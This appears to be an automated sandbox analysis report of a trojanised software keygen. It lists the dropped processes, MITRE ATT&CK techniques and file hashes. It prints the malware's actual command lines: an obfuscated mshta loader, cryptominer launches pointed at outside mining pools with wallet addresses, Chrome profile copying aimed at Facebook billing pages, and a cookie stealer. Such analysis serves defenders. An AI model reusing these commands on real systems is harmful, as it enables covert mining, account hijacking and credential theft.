                                                                                                                                      PID:340
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3952
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:4760
                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:5676
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:5832
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                            2⤵
                                                                                                                                              PID:5920
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                keygen-pr.exe -p83fsase3Ge
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5972
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4872
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4152
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                  keygen-step-1.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5984
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                  keygen-step-5.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6000
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF """" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4484
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                        5⤵
                                                                                                                                                          PID:5176
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe
                                                                                                                                                            D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5228
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF ""/pnPuKn3KQlE3bNFqBn"" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                              7⤵
                                                                                                                                                                PID:4348
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "/pnPuKn3KQlE3bNFqBn" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:1248
                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                  "C:\Windows\System32\regsvr32.exe" -u BZLY.W /s
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                  PID:5544
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill -IM "keygen-step-5.exe" /F
                                                                                                                                                                6⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5376
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                          keygen-step-2.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          PID:6008
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\DAE0.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\DAE0.tmp.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:2664
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DAE0.tmp.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4968
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4952
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:4428
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:4436
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 268
                                                                                                                                                                5⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:188
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5424
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:4408
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                              keygen-step-3.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6024
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2108
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:1316
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                keygen-step-4.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:6032
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:4968
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4488
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:4240
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\E33D.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\E33D.tmp.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5492
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\E33D.tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\E33D.tmp.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3460
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\E6D7.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\E6D7.tmp.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:4680
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w2455 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      PID:5768
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w15137@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3068
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4840
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:5964
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                      PID:5740
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4720
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4912
                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                          xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:4308
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:5156
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa25a04f50,0x7ffa25a04f60,0x7ffa25a04f70
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4364
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4904
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1644 /prefetch:2
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5184
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2248 /prefetch:8
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:1532
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2756 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1308
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2740 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5240
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2400
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1056
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6060
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5376
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15598958834880973270,15912382112019981104,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5860 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5916
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:5104
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5004
                                                                                                                                                                                          • C:\ProgramData\6051477.exe
                                                                                                                                                                                            "C:\ProgramData\6051477.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:3876
                                                                                                                                                                                          • C:\ProgramData\1276472.exe
                                                                                                                                                                                            "C:\ProgramData\1276472.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:3172
                                                                                                                                                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5124
                                                                                                                                                                                          • C:\ProgramData\6828300.exe
                                                                                                                                                                                            "C:\ProgramData\6828300.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2064
                                                                                                                                                                                            • C:\ProgramData\6828300.exe
                                                                                                                                                                                              "{path}"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4464
                                                                                                                                                                                            • C:\ProgramData\6828300.exe
                                                                                                                                                                                              "{path}"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:68
                                                                                                                                                                                            • C:\ProgramData\6828300.exe
                                                                                                                                                                                              "{path}"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:1048
                                                                                                                                                                                          • C:\ProgramData\286763.exe
                                                                                                                                                                                            "C:\ProgramData\286763.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:3676
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:5668
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4424
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:5912
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:6080
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:5736

                                                                                                                                                                                  Network

                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                  Persistence

                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                  1
                                                                                                                                                                                  T1060

                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                  2
                                                                                                                                                                                  T1112

                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                  1
                                                                                                                                                                                  T1130

                                                                                                                                                                                  Credential Access

                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                  4
                                                                                                                                                                                  T1081

                                                                                                                                                                                  Discovery

                                                                                                                                                                                  Query Registry

                                                                                                                                                                                  3
                                                                                                                                                                                  T1012

                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                  4
                                                                                                                                                                                  T1082

                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1018

                                                                                                                                                                                  Collection

                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                  4
                                                                                                                                                                                  T1005

                                                                                                                                                                                  Command and Control

                                                                                                                                                                                  Web Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1102

                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                  Downloads

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    56b6f854bcb81884ad91d24c9b8896b9

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    5c90c8d075b5826db7bd0e157f88694266fae4cf

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    06ca91dc3174a7b6417b7e9c6b2fd2430de50d4c6fbfb686214bb3f26bbda920

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    af0e54dc7d9c3ac118c7622744a76c783a2e87aef62718a447343a50353700ba7d9f318c376bf4cbe4fed2531fc57d0e3f646de9b1ec720adce833021c963932

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                  • \??\pipe\crashpad_4120_SLVSHBSOUCBELSZJ
                                                                                                                                                                                    MD5

